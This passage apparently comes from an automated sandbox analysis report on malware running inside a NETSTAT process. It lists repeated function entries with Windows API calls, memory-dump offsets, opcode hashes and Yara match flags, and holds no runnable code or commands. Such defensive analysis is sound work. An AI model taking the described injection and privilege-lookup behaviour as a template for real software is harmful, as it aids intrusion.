                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ac8b9fd2696ba41590c3ca388febf67a2b501460f8f5ddb1474fc6216f270925
                                          • Instruction ID: 52ca170ef696487f07c7c1a801de1d049e4446894e4aca1ad8afacd1c9085f85
                                          • Opcode Fuzzy Hash: ac8b9fd2696ba41590c3ca388febf67a2b501460f8f5ddb1474fc6216f270925
                                          • Instruction Fuzzy Hash: 6590027134509C46D144B1595404A5600A5A7D0385F51C011A4094695D97658D55B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6dd98c5a782eaa8fa09cd5134ce2e0409aab0c1b5dd423ecbecbdf033c4efe13
                                          • Instruction ID: 01948727bf2aac32d3891619e1fee625ef4957c733fda2a53b82b93dedb77db4
                                          • Opcode Fuzzy Hash: 6dd98c5a782eaa8fa09cd5134ce2e0409aab0c1b5dd423ecbecbdf033c4efe13
                                          • Instruction Fuzzy Hash: 7890027134105C06D184B159540465A0095A7D1381F91C015A4055655DCB558A5977E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 99b1aee2be0f97aa29f4b3e030b6730723916d3d0161d1d994175e2858dcb4e5
                                          • Instruction ID: 8db58ddbb3c33cae2d21b0ba88ee5553007fded08cbfb4b58347650587679d9b
                                          • Opcode Fuzzy Hash: 99b1aee2be0f97aa29f4b3e030b6730723916d3d0161d1d994175e2858dcb4e5
                                          • Instruction Fuzzy Hash: 5890027174505C06D154B15954147560095A7D0381F51C011A4054655D87958A5576E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f2fb2b8b10c65e95bfb1dbd02aa8a8a8d121970ffe637c8f8e8b0e4f2fdeff66
                                          • Instruction ID: c881fab0075559caf482b155e59d390f5e6570f3f9162e9dc2eabe2c26074ec7
                                          • Opcode Fuzzy Hash: f2fb2b8b10c65e95bfb1dbd02aa8a8a8d121970ffe637c8f8e8b0e4f2fdeff66
                                          • Instruction Fuzzy Hash: 6A90027134105C46D104A1595404B560095A7E0381F51C016A4154655D8755C8517561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5c76ff35e13206591bd78b4f630b8b4a9617210ec4cc09e03bd3b2acd2d24232
                                          • Instruction ID: d76541c20bfe4674c0830a0b850f67e6aba33e3f110bd0ccddd68cab48bf0f35
                                          • Opcode Fuzzy Hash: 5c76ff35e13206591bd78b4f630b8b4a9617210ec4cc09e03bd3b2acd2d24232
                                          • Instruction Fuzzy Hash: E69002713410DC06D114A159940475A0095A7D0381F55C411A8454659D87D588917161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5f2934dbd6ca5cb48a4a4f7280cd80fa2c1f4f35e0d93de003755769ea82008f
                                          • Instruction ID: 54685d112781d14d6232e78ec89d99e66c178805a4b59673c2517636b985145e
                                          • Opcode Fuzzy Hash: 5f2934dbd6ca5cb48a4a4f7280cd80fa2c1f4f35e0d93de003755769ea82008f
                                          • Instruction Fuzzy Hash: E290047535105407010DF55D170451700D7F7D53D1351C031F5045551CD771CC717171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4f3bffa4173b43f486683b17bca535ccf5b16aa7c747424120e61cd76ad8d95d
                                          • Instruction ID: 5cc5766123766a0c5e37682c275e7b2859f6e3dbbce4c71e1fffdd2828d17958
                                          • Opcode Fuzzy Hash: 4f3bffa4173b43f486683b17bca535ccf5b16aa7c747424120e61cd76ad8d95d
                                          • Instruction Fuzzy Hash: 32900265361054060149E559160451B04D5B7D63D1391C015F5446591CC76188656361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 43ee8c6d6b364e0d4ccdb099ba72cba01ffdc0bc700ecea3f42ecbd5a5e1ce03
                                          • Instruction ID: 5a52a7ed0e0370b3b475e9459d9d609a5ddcd687d5e1c050917352559f9f31c5
                                          • Opcode Fuzzy Hash: 43ee8c6d6b364e0d4ccdb099ba72cba01ffdc0bc700ecea3f42ecbd5a5e1ce03
                                          • Instruction Fuzzy Hash: 4F9002A1342054074109B1595414626409AA7E0281B51C021E5044591DC66588917165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BC88B0 Relevance: .3, Instructions: 288COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 074c2036f3219a81dd98b9a0addef7e65102c2b696b389c22f915089b33be9f1
                                          • Instruction ID: 245f7df2d658b8a2cec973487fe27942cdbca14ffa51226a49eb32fe37a84e08
                                          • Opcode Fuzzy Hash: 074c2036f3219a81dd98b9a0addef7e65102c2b696b389c22f915089b33be9f1
                                          • Instruction Fuzzy Hash: 30A185B1D00209ABDB14EFA4CC42FEEB7F8EF44304F0445AEF515A7241EB71AA458BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BC88AF Relevance: .2, Instructions: 220COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: f37971a2c6a773b79855d8f13411a2433f0c5456e05823e448818ddc1d1afd3e
                                          • Instruction ID: 8eeb7323835e5756008008ba12acb5a42646564aae301db209193404e8aa6f76
                                          • Opcode Fuzzy Hash: f37971a2c6a773b79855d8f13411a2433f0c5456e05823e448818ddc1d1afd3e
                                          • Instruction Fuzzy Hash: 0971C2B1D00219AADB24EBA4CC42FEEB7F8EF44304F0445DEF51966241EB71AA45CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDB440 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 00BDB4FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: d7824cc38a024672265e3aa1ed98203d4ad0329e2fd8da2843ae6dba6c17353a
                                          • Instruction ID: f62743e135112beabbc9ea4ab61883374636ab7b4bd1f3ee209480bad7a15443
                                          • Opcode Fuzzy Hash: d7824cc38a024672265e3aa1ed98203d4ad0329e2fd8da2843ae6dba6c17353a
                                          • Instruction Fuzzy Hash: 48319EB5600604ABC724DFA8D8C1FABF7F8EB88704F10815EE65E5B345E770A544CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDB434 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 00BDB4FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: b79dafcaa63ab5027b96cb7ccf62ec471a25b7b3e045617eb2114c4fbdb2149b
                                          • Instruction ID: 8f78d363ee49fb32a5ef94b8366d47b32ff7dd47eaf2ab781778cedc904c108b
                                          • Opcode Fuzzy Hash: b79dafcaa63ab5027b96cb7ccf62ec471a25b7b3e045617eb2114c4fbdb2149b
                                          • Instruction Fuzzy Hash: 9731C4B1A00600ABC714DF64D8C1FAAFBF8EB48704F14819EEA595B346E7706554CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BD4D2B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00BD4D47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 68d33d362902243586190b310a5ede7d4c4809b5e4e438ba107da72a504fbc6c
                                          • Instruction ID: 8290b8a37866f330d68286bdd9b9856187da9ce8b3da933c800a45310d810a96
                                          • Opcode Fuzzy Hash: 68d33d362902243586190b310a5ede7d4c4809b5e4e438ba107da72a504fbc6c
                                          • Instruction Fuzzy Hash: AD316375A0020AAFCB04DFD8D8809EFB7B9FF48304B108599E515EB354E771EE058BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BD4D30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00BD4D47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 68acf39488a1566cf0686f83f46ac049d2e3d485f685d97833a5de9528773939
                                          • Instruction ID: b8ecc6a5674da878728e0c158f9212a1726a16fe181b84fd5605838b7cd4eb70
                                          • Opcode Fuzzy Hash: 68acf39488a1566cf0686f83f46ac049d2e3d485f685d97833a5de9528773939
                                          • Instruction Fuzzy Hash: 2A313275A0020AAFDB00DFD8D8809EFB7B9FF88304B108599E515EB314E775EE058BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BC7660 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00BC76BA
                                          • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00BC76DB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 0de3faa4af71b190035b40812e920cf22ad6d4533d41ba8f7304673b02ec721f
                                          • Instruction ID: 43b77d9dcc0a58ce0a1f321a62457a31a9afaf1642961c2dd2ac7fba6bf16486
                                          • Opcode Fuzzy Hash: 0de3faa4af71b190035b40812e920cf22ad6d4533d41ba8f7304673b02ec721f
                                          • Instruction Fuzzy Hash: 4701A731A8022877E721A6948C43FFE77AC9B41B50F040159FF04BA2C1FA94B90647EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BCF7F0 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 00BCF8D8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 6fcacd8bc34b3f417b9f857ebc6c4e00a5b627cd3df4932bec3b6410d36bda2f
                                          • Instruction ID: 8a73a65b1687c50abe65b11cbd153cfdf144abc90f273dcbcd9ce3ee667afa18
                                          • Opcode Fuzzy Hash: 6fcacd8bc34b3f417b9f857ebc6c4e00a5b627cd3df4932bec3b6410d36bda2f
                                          • Instruction Fuzzy Hash: 535165B65102146BD725EB64CC85FEBB3BCEF48300F0446DAB6695B152FE30EB858B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BCF7ED Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 00BCF8D8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 4b2dea59289ab21ff06fe6cd5d3ffbb1c69e645c67548c293b04a01ad4820636
                                          • Instruction ID: a4de65ac85829094a074364e573e7f95ff2856b8b715b63321da0967d16451d9
                                          • Opcode Fuzzy Hash: 4b2dea59289ab21ff06fe6cd5d3ffbb1c69e645c67548c293b04a01ad4820636
                                          • Instruction Fuzzy Hash: BE5167B65102046BD725EB64CC85FEBB3BCEF48300F0446DDB6695B252FA30E6858B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDCAB2 Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00BD6A16,?,00BD71BD,00BD71BD,?,00BD6A16,?,?,?,?,?,00000000,00000005,00000206), ref: 00BDCA6D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 702ff153f0d53c6325599c6b7701dc2f5a5c8db231171ba56751dde1648f0977
                                          • Instruction ID: 422c07d1abdda2ea518f7ace68953f65399b9a045c8e3efa17ab0447ed27cf0c
                                          • Opcode Fuzzy Hash: 702ff153f0d53c6325599c6b7701dc2f5a5c8db231171ba56751dde1648f0977
                                          • Instruction Fuzzy Hash: 1C117CB6204108AFCB14DFA8EC80DEB77ADEF88354F118689F94C87251D630E911CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BCABF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00BCAC62
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction ID: 449c0185094f7ea68f0d9c8d862834e333b5df952e7074106061e254650b2ec7
                                          • Opcode Fuzzy Hash: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction Fuzzy Hash: 75011EB5E4020EABDB10EBA4DC42FEEB7B8DB54708F0445E5E90997241F631EB548B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDCA07 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00BD6A16,?,00BD71BD,00BD71BD,?,00BD6A16,?,?,?,?,?,00000000,00000005,00000206), ref: 00BDCA6D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction ID: 243629c867c49c8f3283465774f246ddce14dfa0af4116225f189c647daec4ab
                                          • Opcode Fuzzy Hash: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction Fuzzy Hash: 85F068B52002046FDB14DF94DC85DEB77A9EF84350F10869AFD5957741E630ED11CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDB580 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,E80B3131,00000000,00000000,?,?,?,E80B3131,?), ref: 00BDB5BC
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: eee904ed97176660016744ef57a1f7af0b4c31c8af90f5706c5d201cdca9aa5a
                                          • Instruction ID: 68754e9cd4653c8bde317bca7a77d225ebbb26390a8b0a6ef1195ea4c6a4edfa
                                          • Opcode Fuzzy Hash: eee904ed97176660016744ef57a1f7af0b4c31c8af90f5706c5d201cdca9aa5a
                                          • Instruction Fuzzy Hash: 8EE0653338120436E320619D9C03FDBB3CCDB81B21F150066FA0DEA2C1E991F90102A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDCBD1 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BCDC62,00BCDC62,?,00000000,?,?), ref: 00BDCC10
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction ID: ef752170e052ddcf9b25f8aa534e50486035e26ee30711a31bf19c5f936c114c
                                          • Opcode Fuzzy Hash: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction Fuzzy Hash: E2E06DB1340204AFD720DF59CC85EEB77A9AF88364F1585ADFD49A7241D630E901CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BCE300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00BD3D22,?,?,00BD3D22,00000000,?), ref: 00BCE32A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: e78146e52c0a2be0d067f0a189e35af7ef539330da83deb21ca263a2f310c3c8
                                          • Instruction ID: 0922d9b3a00189c1e1e6dd9d84623ab9dae551d9c05bd8ac60640dbf59007fe2
                                          • Opcode Fuzzy Hash: e78146e52c0a2be0d067f0a189e35af7ef539330da83deb21ca263a2f310c3c8
                                          • Instruction Fuzzy Hash: 9BE0867128020867FB24A6A89C46F6A3398CBC8724F5846D4F92CDB3C2E674F9434168
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BCE2FC Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00BD3D22,?,?,00BD3D22,00000000,?), ref: 00BCE32A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: e8ee7c209d29303dc0a5569b4d8b4577a41670ec2e589ad5bf5705c0dab89709
                                          • Instruction ID: bee4088ea2ea43938dccc11022da0e7ad539ad9ee376ce181184baf43e68cd3d
                                          • Opcode Fuzzy Hash: e8ee7c209d29303dc0a5569b4d8b4577a41670ec2e589ad5bf5705c0dab89709
                                          • Instruction Fuzzy Hash: F5E0867118030467F72466688C46FA933988BCC724F544694F9689B3D2E674F9434268
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDCA80 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00BDCAAD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction ID: e1208a3c9d246f314033e115a11c6f3080bd19faefb09fff27b5c4b5a6531eef
                                          • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction Fuzzy Hash: 8AE01AB12002046BD714DF49DC49E9777ACAF88750F014155B90957241D530E914CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDCA40 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00BD6A16,?,00BD71BD,00BD71BD,?,00BD6A16,?,?,?,?,?,00000000,00000005,00000206), ref: 00BDCA6D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
